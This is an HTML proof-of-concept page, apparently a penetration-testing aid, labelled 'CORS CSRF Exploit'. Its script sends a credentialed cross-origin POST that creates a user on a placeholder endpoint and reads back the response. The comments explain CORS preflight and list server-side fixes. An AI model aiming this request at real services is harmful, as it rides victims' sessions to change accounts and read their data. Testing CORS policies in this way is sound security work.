<!DOCTYPE html>
<html>
<head>
<script>
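/**
 * Sends one credentialed, cross-origin JSON POST to the target endpoint and
 * shows the response body once the request completes with HTTP 200.
 *
 * What a result means for the server under test:
 * - "application/json" is not a CORS-safelisted Content-Type, so the browser
 *   sends an OPTIONS preflight first. The POST only goes out if the preflight
 *   response allows this page's origin, the Content-Type header and
 *   credentials.
 * - The response body is readable here only if the server also returns
 *   Access-Control-Allow-Origin for this origin (not "*") together with
 *   Access-Control-Allow-Credentials: true. A blocked response reports
 *   status 0, so the handler below never displays anything.
 * - A success from an unrelated origin therefore points at the server's CORS
 *   policy. The remediation is server-side: an exact-match origin allowlist
 *   instead of a reflected Origin, anti-CSRF tokens on state-changing
 *   requests, and SameSite cookies for the session.
 */
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function () {
    // readyState 4 is DONE; only a completed 200 response is displayed.
    if (this.readyState === 4 && this.status === 200) {
      alert(this.responseText);
      // alert() returns undefined, so assigning its result to innerHTML only
      // ever printed "undefined". Write the body itself, and use textContent
      // so markup in the cross-origin response is not parsed into this page.
      document.getElementById("demo").textContent = this.responseText;
    }
  };
  xhttp.open("POST", "http://example.com/Users", true);
  // Attach cookies / HTTP auth for the target origin to the request.
  xhttp.withCredentials = true;
  xhttp.setRequestHeader("Content-Type", "application/json");
  // send() may be called once per open(); a second call throws
  // InvalidStateError, so the request is dispatched exactly once.
  xhttp.send(JSON.stringify({"Title":"Mr","FirstName":"test","MiddleName":"","LastName":"cors","PhoneNumber":"","EmailAddress":"[email protected]"}));
}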
</script>
</head>
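<body>
<!--
  Test page for checking how the target API's CORS policy treats a
  credentialed cross-origin POST. The button runs cors(), defined in the
  head script, and the result is written to #demo.
-->
<main style="text-align: center">
<h1>CORS CSRF Exploit</h1>
<p>create a user &amp; Show the response</p>
<button type="button" onclick="cors()">Exploit</button>
<!-- Output sits outside the button's container so that writing the
     response into #demo does not remove the control. -->
<div id="demo" aria-live="polite"></div>
</main>
</body>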
</html>